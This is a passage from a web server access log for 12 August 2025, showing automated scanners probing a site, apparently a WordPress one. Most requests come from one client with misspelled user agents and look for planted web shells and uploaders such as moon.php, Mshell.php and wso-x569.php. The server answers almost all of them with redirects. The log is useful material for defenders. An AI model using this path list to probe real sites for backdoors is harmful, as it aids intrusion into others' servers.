Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:22:40 -0400] "GET /bala.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:24:30 -0400] "GET /ALFA_DATA/alfacgiapi/ HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:25:07 -0400] "GET /wp-content/plugins/dummyyummy/wp-signup.php HTTP/1.1" 301 278 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:25:13 -0400] "GET /defaul1.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 152.42.157.60 - - [12/Aug/2025:18:25:56 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:18:25:56 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:18:25:56 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:18:25:56 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:18:26:01 -0400] "GET /wp-includes/customize/mariju.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:26:06 -0400] "GET /wp-content/plugins/shell/about.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:18:26:42 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:18:26:42 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:18:26:43 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:18:26:43 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 94.16.113.252 - - [12/Aug/2025:18:27:42 -0400] "GET /wp-login.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:28:01 -0400] "GET /wp-content/plugins/anttt/simple.php HTTP/1.1" 301 270 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:18:29:17 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:18:29:17 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:18:29:17 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:18:29:17 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:18:29:42 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:18:29:42 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:18:29:42 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:18:29:42 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:18:29:57 -0400] "GET /wp-content/plugins/wordpresss3cll/up.php HTTP/1.1" 301 275 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 34.83.196.167 - - [12/Aug/2025:18:30:02 -0400] "HEAD /wordpress HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 34.83.196.167 - - [12/Aug/2025:18:30:03 -0400] "HEAD / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 34.83.196.167 - - [12/Aug/2025:18:30:04 -0400] "HEAD /wp HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 34.83.196.167 - - [12/Aug/2025:18:30:04 -0400] "HEAD /bc HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 34.83.196.167 - - [12/Aug/2025:18:30:05 -0400] "HEAD /bk HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 34.83.196.167 - - [12/Aug/2025:18:30:05 -0400] "HEAD /backup HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 34.83.196.167 - - [12/Aug/2025:18:30:06 -0400] "HEAD /old HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 34.83.196.167 - - [12/Aug/2025:18:30:06 -0400] "HEAD /new HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 34.83.196.167 - - [12/Aug/2025:18:30:07 -0400] "HEAD /main HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 34.83.196.167 - - [12/Aug/2025:18:30:07 -0400] "HEAD /home HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:30:24 -0400] "GET /wp-includes/wp-class.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:31:09 -0400] "GET /wp-admin/network/mariju.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:32:08 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 264 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:32:55 -0400] "GET / HTTP/1.1" 301 235 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:33:31 -0400] "GET /Mshell.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:34:00 -0400] "GET /wp-content/plugins/WordPressCore/ HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:35:00 -0400] "GET /.well-known/pki-validation/wp-login.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 146.190.11.185 - - [12/Aug/2025:18:35:40 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:18:35:40 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:18:35:40 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:18:35:41 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:18:35:48 -0400] "GET /epinyins.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:36:06 -0400] "GET /css/ HTTP/1.1" 301 239 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:36:56 -0400] "GET /wp-content/upgrade-temp-backup/about.php HTTP/1.1" 301 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:37:08 -0400] "GET /wp-content/plugins/wp-help/mini.php HTTP/1.1" 301 270 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:38:53 -0400] "GET /wp-content/plugins/moon.php HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:39:00 -0400] "GET /wp-admin/images/moon.php HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:39:03 -0400] "GET /.tmb/moon.php HTTP/1.1" 301 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:39:06 -0400] "GET /wp-content/uploads/wpr-addons/forms/ HTTP/1.1" 301 271 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:39:09 -0400] "GET /.well-known/acme-challenge/moon.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:39:27 -0400] "GET /cgi-bin/moon.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:39:38 -0400] "GET /wp-admin/user/moon.php HTTP/1.1" 301 257 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:39:42 -0400] "GET /wso-x569.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:39:53 -0400] "GET /wp-content/upgrade/moon.php HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:39:57 -0400] "GET /wp-admin/js/widgets/moon.php HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:40:10 -0400] "GET /wp-admin/maint/moon.php HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:40:16 -0400] "GET /wp-includes/ID3/moon.php HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:40:18 -0400] "GET /wp-includes/js/tinymce/skins/lightgray/img/index.php?p= HTTP/1.1" 301 290 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:40:19 -0400] "GET /wp-includes/certificates/moon.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:40:27 -0400] "GET /wp-admin/includes/moon.php HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 173.252.107.112 - - [12/Aug/2025:18:40:29 -0400] "GET /teeth-aligners HTTP/1.1" 301 245 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 94.16.113.252 - - [12/Aug/2025:18:40:41 -0400] "GET /wp-includes/IXR/moon.php HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:40:50 -0400] "GET /wp-seo.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:41:09 -0400] "GET /Mshell.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:41:14 -0400] "GET /wp-admin/images/moon.php HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:41:17 -0400] "GET /wp-admin/css/colors/ HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 199.45.154.115 - - [12/Aug/2025:18:41:30 -0400] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 199.45.154.115 - - [12/Aug/2025:18:41:38 -0400] "GET /favicon.ico HTTP/1.1" 301 246 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 94.16.113.252 - - [12/Aug/2025:18:41:38 -0400] "GET /inputs.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 199.45.154.115 - - [12/Aug/2025:18:41:47 -0400] "GET /login HTTP/1.1" 301 240 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 94.16.113.252 - - [12/Aug/2025:18:42:22 -0400] "GET /.well-known/acme-challenge/moon.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:44:08 -0400] "GET /wp-rocket.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 86.8.204.43 - - [12/Aug/2025:18:44:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:18:44:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:18:44:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:18:44:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:18:44:26 -0400] "GET /wp-apxupx.php?apx=upx HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:44:28 -0400] "GET /gawean.PhP7 HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:18:45:34 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:18:45:34 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:18:45:34 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:18:45:34 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:18:45:35 -0400] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:45:47 -0400] "GET /wp-admin/css/colors/blue/ HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:46:03 -0400] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 301 273 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:46:13 -0400] "GET /cgi-bin/moon.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:46:32 -0400] "GET /wp-content/plugins/index.php?p= HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:46:38 -0400] "GET /wp-includes/js/500.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:47:34 -0400] "GET /wp-admin/js/widgets/moon.php HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:47:35 -0400] "GET /woh.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:48:07 -0400] "GET /wp-admin/maint/moon.php HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:48:34 -0400] "GET /users.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:49:19 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:49:53 -0400] "GET /dropdown.php HTTP/1.1" 301 247 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:18:50:41 -0400] "GET /wp-admin/network/ HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:50:51 -0400] "GET /classwithtostring.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 